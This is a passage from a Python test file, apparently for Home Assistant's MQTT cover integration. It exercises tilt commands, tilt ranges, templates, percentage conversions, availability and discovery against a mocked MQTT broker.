ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 0
await hass.services.async_call(
cover.DOMAIN,
SERVICE_TOGGLE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "100", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Open tilt status would be received from device when non-optimistic
async_fire_mqtt_message(hass, "tilt-status-topic", "100")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 100
await hass.services.async_call(
cover.DOMAIN,
SERVICE_TOGGLE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with("tilt-command-topic", "0", 0, False)
async def test_tilt_given_value(hass, mqtt_mock):
"""Test tilting to a given value."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_opened_value": 80,
"tilt_closed_value": 25,
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_OPEN_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "80", 0, False
)
mqtt_mock.async_publish.reset_mock()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_CLOSE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "25", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Close tilt status would be received from device when non-optimistic
async_fire_mqtt_message(hass, "tilt-status-topic", "25")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 25
await hass.services.async_call(
cover.DOMAIN,
SERVICE_TOGGLE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "80", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Open tilt status would be received from device when non-optimistic
async_fire_mqtt_message(hass, "tilt-status-topic", "80")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 80
await hass.services.async_call(
cover.DOMAIN,
SERVICE_TOGGLE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "25", 0, False
)
async def test_tilt_given_value_optimistic(hass, mqtt_mock):
"""Test tilting to a given value."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_opened_value": 80,
"tilt_closed_value": 25,
"tilt_optimistic": True,
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_OPEN_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 80
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "80", 0, False
)
mqtt_mock.async_publish.reset_mock()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_TILT_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 50},
blocking=True,
)
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "50", 0, False
)
mqtt_mock.async_publish.reset_mock()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_CLOSE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 25
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "25", 0, False
)
async def test_tilt_given_value_altered_range(hass, mqtt_mock):
"""Test tilting to a given value."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_opened_value": 25,
"tilt_closed_value": 0,
"tilt_min": 0,
"tilt_max": 50,
"tilt_optimistic": True,
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_OPEN_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "25", 0, False
)
mqtt_mock.async_publish.reset_mock()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_CLOSE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 0
mqtt_mock.async_publish.assert_called_once_with("tilt-command-topic", "0", 0, False)
mqtt_mock.async_publish.reset_mock()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_TOGGLE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "25", 0, False
)
async def test_tilt_via_topic(hass, mqtt_mock):
"""Test tilt by updating status via MQTT."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tilt-status-topic", "0")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 0
async_fire_mqtt_message(hass, "tilt-status-topic", "50")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
async def test_tilt_via_topic_template(hass, mqtt_mock):
"""Test tilt by updating status via MQTT and template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_status_template": "{{ (value | multiply(0.01)) | int }}",
"tilt_opened_value": 400,
"tilt_closed_value": 125,
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tilt-status-topic", "99")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 0
async_fire_mqtt_message(hass, "tilt-status-topic", "5000")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
async def test_tilt_via_topic_template_json_value(hass, mqtt_mock, caplog):
"""Test tilt by updating status via MQTT and template with JSON value."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_status_template": "{{ value_json.Var1 }}",
"tilt_opened_value": 400,
"tilt_closed_value": 125,
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tilt-status-topic", '{"Var1": 9, "Var2": 30}')
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 9
async_fire_mqtt_message(hass, "tilt-status-topic", '{"Var1": 50, "Var2": 10}')
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
async_fire_mqtt_message(hass, "tilt-status-topic", '{"Var2": 10}')
assert (
"Template variable warning: 'dict object' has no attribute 'Var1' when rendering"
) in caplog.text
async def test_tilt_via_topic_altered_range(hass, mqtt_mock):
"""Test tilt status via MQTT with altered tilt range."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_min": 0,
"tilt_max": 50,
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tilt-status-topic", "0")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 0
async_fire_mqtt_message(hass, "tilt-status-topic", "50")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 100
async_fire_mqtt_message(hass, "tilt-status-topic", "25")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
async def test_tilt_status_out_of_range_warning(hass, caplog, mqtt_mock):
"""Test tilt status via MQTT tilt out of range warning message."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_min": 0,
"tilt_max": 50,
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tilt-status-topic", "60")
assert (
"Payload '60' is out of range, must be between '0' and '50' inclusive"
) in caplog.text
async def test_tilt_status_not_numeric_warning(hass, caplog, mqtt_mock):
"""Test tilt status via MQTT tilt not numeric warning message."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_min": 0,
"tilt_max": 50,
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tilt-status-topic", "abc")
assert ("Payload 'abc' is not numeric") in caplog.text
async def test_tilt_via_topic_altered_range_inverted(hass, mqtt_mock):
"""Test tilt status via MQTT with altered tilt range and inverted tilt position."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_min": 50,
"tilt_max": 0,
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tilt-status-topic", "0")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 100
async_fire_mqtt_message(hass, "tilt-status-topic", "50")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 0
async_fire_mqtt_message(hass, "tilt-status-topic", "25")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
async def test_tilt_via_topic_template_altered_range(hass, mqtt_mock):
"""Test tilt status via MQTT and template with altered tilt range."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_status_template": "{{ (value | multiply(0.01)) | int }}",
"tilt_opened_value": 400,
"tilt_closed_value": 125,
"tilt_min": 0,
"tilt_max": 50,
}
},
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tilt-status-topic", "99")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 0
async_fire_mqtt_message(hass, "tilt-status-topic", "5000")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 100
async_fire_mqtt_message(hass, "tilt-status-topic", "2500")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_tilt_position == 50
async def test_tilt_position(hass, mqtt_mock):
"""Test tilt via method invocation."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_TILT_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 50},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "50", 0, False
)
async def test_tilt_position_templated(hass, mqtt_mock):
"""Test tilt position via template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_command_template": "{{100-32}}",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_TILT_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 100},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "68", 0, False
)
async def test_tilt_position_altered_range(hass, mqtt_mock):
"""Test tilt via method invocation with altered range."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"tilt_opened_value": 400,
"tilt_closed_value": 125,
"tilt_min": 0,
"tilt_max": 50,
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_TILT_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 50},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "25", 0, False
)
async def test_find_percentage_in_range_defaults(hass, mqtt_mock):
"""Test find percentage in range with default range."""
mqtt_cover = MqttCover(
hass,
{
"name": "cover.test",
"state_topic": "state-topic",
"get_position_topic": None,
"command_topic": "command-topic",
"availability_topic": None,
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"qos": 0,
"retain": False,
"state_open": "OPEN",
"state_closed": "CLOSE",
"position_open": 100,
"position_closed": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"payload_available": None,
"payload_not_available": None,
"optimistic": False,
"value_template": None,
"tilt_open_position": 100,
"tilt_closed_position": 0,
"tilt_min": 0,
"tilt_max": 100,
"tilt_optimistic": False,
"set_position_topic": None,
"set_position_template": None,
"unique_id": None,
"device_config": None,
},
None,
None,
)
assert mqtt_cover.find_percentage_in_range(44) == 44
assert mqtt_cover.find_percentage_in_range(44, "cover") == 44
async def test_find_percentage_in_range_altered(hass, mqtt_mock):
"""Test find percentage in range with altered range."""
mqtt_cover = MqttCover(
hass,
{
"name": "cover.test",
"state_topic": "state-topic",
"get_position_topic": None,
"command_topic": "command-topic",
"availability_topic": None,
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"qos": 0,
"retain": False,
"state_open": "OPEN",
"state_closed": "CLOSE",
"position_open": 180,
"position_closed": 80,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"payload_available": None,
"payload_not_available": None,
"optimistic": False,
"value_template": None,
"tilt_open_position": 180,
"tilt_closed_position": 80,
"tilt_min": 80,
"tilt_max": 180,
"tilt_optimistic": False,
"set_position_topic": None,
"set_position_template": None,
"unique_id": None,
"device_config": None,
},
None,
None,
)
assert mqtt_cover.find_percentage_in_range(120) == 40
assert mqtt_cover.find_percentage_in_range(120, "cover") == 40
async def test_find_percentage_in_range_defaults_inverted(hass, mqtt_mock):
"""Test find percentage in range with default range but inverted."""
mqtt_cover = MqttCover(
hass,
{
"name": "cover.test",
"state_topic": "state-topic",
"get_position_topic": None,
"command_topic": "command-topic",
"availability_topic": None,
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"qos": 0,
"retain": False,
"state_open": "OPEN",
"state_closed": "CLOSE",
"position_open": 0,
"position_closed": 100,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"payload_available": None,
"payload_not_available": None,
"optimistic": False,
"value_template": None,
"tilt_open_position": 100,
"tilt_closed_position": 0,
"tilt_min": 100,
"tilt_max": 0,
"tilt_optimistic": False,
"set_position_topic": None,
"set_position_template": None,
"unique_id": None,
"device_config": None,
},
None,
None,
)
assert mqtt_cover.find_percentage_in_range(44) == 56
assert mqtt_cover.find_percentage_in_range(44, "cover") == 56
async def test_find_percentage_in_range_altered_inverted(hass, mqtt_mock):
"""Test find percentage in range with altered range and inverted."""
mqtt_cover = MqttCover(
hass,
{
"name": "cover.test",
"state_topic": "state-topic",
"get_position_topic": None,
"command_topic": "command-topic",
"availability_topic": None,
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"qos": 0,
"retain": False,
"state_open": "OPEN",
"state_closed": "CLOSE",
"position_open": 80,
"position_closed": 180,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"payload_available": None,
"payload_not_available": None,
"optimistic": False,
"value_template": None,
"tilt_open_position": 180,
"tilt_closed_position": 80,
"tilt_min": 180,
"tilt_max": 80,
"tilt_optimistic": False,
"set_position_topic": None,
"set_position_template": None,
"unique_id": None,
"device_config": None,
},
None,
None,
)
assert mqtt_cover.find_percentage_in_range(120) == 60
assert mqtt_cover.find_percentage_in_range(120, "cover") == 60
async def test_find_in_range_defaults(hass, mqtt_mock):
"""Test find in range with default range."""
mqtt_cover = MqttCover(
hass,
{
"name": "cover.test",
"state_topic": "state-topic",
"get_position_topic": None,
"command_topic": "command-topic",
"availability_topic": None,
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"qos": 0,
"retain": False,
"state_open": "OPEN",
"state_closed": "CLOSE",
"position_open": 100,
"position_closed": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"payload_available": None,
"payload_not_available": None,
"optimistic": False,
"value_template": None,
"tilt_open_position": 100,
"tilt_closed_position": 0,
"tilt_min": 0,
"tilt_max": 100,
"tilt_optimistic": False,
"set_position_topic": None,
"set_position_template": None,
"unique_id": None,
"device_config": None,
},
None,
None,
)
assert mqtt_cover.find_in_range_from_percent(44) == 44
assert mqtt_cover.find_in_range_from_percent(44, "cover") == 44
async def test_find_in_range_altered(hass, mqtt_mock):
"""Test find in range with altered range."""
mqtt_cover = MqttCover(
hass,
{
"name": "cover.test",
"state_topic": "state-topic",
"get_position_topic": None,
"command_topic": "command-topic",
"availability_topic": None,
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"qos": 0,
"retain": False,
"state_open": "OPEN",
"state_closed": "CLOSE",
"position_open": 180,
"position_closed": 80,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"payload_available": None,
"payload_not_available": None,
"optimistic": False,
"value_template": None,
"tilt_open_position": 180,
"tilt_closed_position": 80,
"tilt_min": 80,
"tilt_max": 180,
"tilt_optimistic": False,
"set_position_topic": None,
"set_position_template": None,
"unique_id": None,
"device_config": None,
},
None,
None,
)
assert mqtt_cover.find_in_range_from_percent(40) == 120
assert mqtt_cover.find_in_range_from_percent(40, "cover") == 120
async def test_find_in_range_defaults_inverted(hass, mqtt_mock):
"""Test find in range with default range but inverted."""
mqtt_cover = MqttCover(
hass,
{
"name": "cover.test",
"state_topic": "state-topic",
"get_position_topic": None,
"command_topic": "command-topic",
"availability_topic": None,
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"qos": 0,
"retain": False,
"state_open": "OPEN",
"state_closed": "CLOSE",
"position_open": 0,
"position_closed": 100,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"payload_available": None,
"payload_not_available": None,
"optimistic": False,
"value_template": None,
"tilt_open_position": 100,
"tilt_closed_position": 0,
"tilt_min": 100,
"tilt_max": 0,
"tilt_optimistic": False,
"set_position_topic": None,
"set_position_template": None,
"unique_id": None,
"device_config": None,
},
None,
None,
)
assert mqtt_cover.find_in_range_from_percent(56) == 44
assert mqtt_cover.find_in_range_from_percent(56, "cover") == 44
async def test_find_in_range_altered_inverted(hass, mqtt_mock):
"""Test find in range with altered range and inverted."""
mqtt_cover = MqttCover(
hass,
{
"name": "cover.test",
"state_topic": "state-topic",
"get_position_topic": None,
"command_topic": "command-topic",
"availability_topic": None,
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
"qos": 0,
"retain": False,
"state_open": "OPEN",
"state_closed": "CLOSE",
"position_open": 80,
"position_closed": 180,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"payload_available": None,
"payload_not_available": None,
"optimistic": False,
"value_template": None,
"tilt_open_position": 180,
"tilt_closed_position": 80,
"tilt_min": 180,
"tilt_max": 80,
"tilt_optimistic": False,
"set_position_topic": None,
"set_position_template": None,
"unique_id": None,
"device_config": None,
},
None,
None,
)
assert mqtt_cover.find_in_range_from_percent(60) == 120
assert mqtt_cover.find_in_range_from_percent(60, "cover") == 120
async def test_availability_when_connection_lost(hass, mqtt_mock):
"""Test availability after MQTT disconnection."""
await help_test_availability_when_connection_lost(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_availability_without_topic(hass, mqtt_mock):
"""Test availability without defined availability topic."""
await help_test_availability_without_topic(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_default_availability_payload(hass, mqtt_mock):
"""Test availability by default payload with defined topic."""
await help_test_default_availability_payload(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_custom_availability_payload(hass, mqtt_mock):
"""Test availability by custom payload with defined topic."""
await help_test_custom_availability_payload(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_valid_device_class(hass, mqtt_mock):
"""Test the setting of a valid sensor class."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"device_class": "garage",
"state_topic": "test-topic",
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.attributes.get("device_class") == "garage"
async def test_invalid_device_class(hass, mqtt_mock):
"""Test the setting of an invalid sensor class."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"device_class": "abc123",
"state_topic": "test-topic",
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state is None
async def test_setting_attribute_via_mqtt_json_message(hass, mqtt_mock):
"""Test the setting of attribute via MQTT with JSON payload."""
await help_test_setting_attribute_via_mqtt_json_message(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_setting_blocked_attribute_via_mqtt_json_message(hass, mqtt_mock):
"""Test the setting of attribute via MQTT with JSON payload."""
await help_test_setting_blocked_attribute_via_mqtt_json_message(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG, MQTT_COVER_ATTRIBUTES_BLOCKED
)
async def test_setting_attribute_with_template(hass, mqtt_mock):
"""Test the setting of attribute via MQTT with JSON payload."""
await help_test_setting_attribute_with_template(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_update_with_json_attrs_not_dict(hass, mqtt_mock, caplog):
"""Test attributes get extracted from a JSON result."""
await help_test_update_with_json_attrs_not_dict(
hass, mqtt_mock, caplog, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_update_with_json_attrs_bad_json(hass, mqtt_mock, caplog):
"""Test attributes get extracted from a JSON result."""
await help_test_update_with_json_attrs_bad_JSON(
hass, mqtt_mock, caplog, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_discovery_update_attr(hass, mqtt_mock, caplog):
"""Test update of discovered MQTTAttributes."""
await help_test_discovery_update_attr(
hass, mqtt_mock, caplog, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_unique_id(hass, mqtt_mock):
"""Test unique_id option only creates one cover per id."""
config = {
cover.DOMAIN: [
{
"platform": "mqtt",
"name": "Test 1",
"state_topic": "test-topic",
"unique_id": "TOTALLY_UNIQUE",
},
{
"platform": "mqtt",
"name": "Test 2",
"state_topic": "test-topic",
"unique_id": "TOTALLY_UNIQUE",
},
]
}
await help_test_unique_id(hass, mqtt_mock, cover.DOMAIN, config)
async def test_discovery_removal_cover(hass, mqtt_mock, caplog):
"""Test removal of discovered cover."""
data = '{ "name": "test", "command_topic": "test_topic" }'
await help_test_discovery_removal(hass, mqtt_mock, caplog, cover.DOMAIN, data)
async def test_discovery_update_cover(hass, mqtt_mock, caplog):
"""Test update of discovered cover."""
config1 = {"name": "Beer", "command_topic": "test_topic"}
config2 = {"name": "Milk", "command_topic": "test_topic"}
await help_test_discovery_update(
hass, mqtt_mock, caplog, cover.DOMAIN, config1, config2
)
async def test_discovery_update_unchanged_cover(hass, mqtt_mock, caplog):
"""Test update of discovered cover."""
data1 = '{ "name": "Beer", "command_topic": "test_topic" }'
with patch(
"homeassistant.components.mqtt.cover.MqttCover.discovery_update"
) as discovery_update:
await help_test_discovery_update_unchanged(
hass, mqtt_mock, caplog, cover.DOMAIN, data1, discovery_update
)
@pytest.mark.no_fail_on_log_exception
async def test_discovery_broken(hass, mqtt_mock, caplog):
"""Test handling of bad discovery message."""
data1 = '{ "name": "Beer", "command_topic": "test_topic#" }'
data2 = '{ "name": "Milk", "command_topic": "test_topic" }'
await help_test_discovery_broken(
hass, mqtt_mock, caplog, cover.DOMAIN, data1, data2
)
async def test_entity_device_info_with_connection(hass, mqtt_mock):
"""Test MQTT cover device registry integration."""
await help_test_entity_device_info_with_connection(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_entity_device_info_with_identifier(hass, mqtt_mock):
"""Test MQTT cover device registry integration."""
await help_test_entity_device_info_with_identifier(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_entity_device_info_update(hass, mqtt_mock):
"""Test device registry update."""
await help_test_entity_device_info_update(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_entity_device_info_remove(hass, mqtt_mock):
"""Test device registry remove."""
await help_test_entity_device_info_remove(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_entity_id_update_subscriptions(hass, mqtt_mock):
"""Test MQTT subscriptions are managed when entity_id is updated."""
await help_test_entity_id_update_subscriptions(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_entity_id_update_discovery_update(hass, mqtt_mock):
"""Test MQTT discovery update when entity_id is updated."""
await help_test_entity_id_update_discovery_update(
hass, mqtt_mock, cover.DOMAIN, DEFAULT_CONFIG
)
async def test_entity_debug_info_message(hass, mqtt_mock):
"""Test MQTT debug info."""
await help_test_entity_debug_info_message(
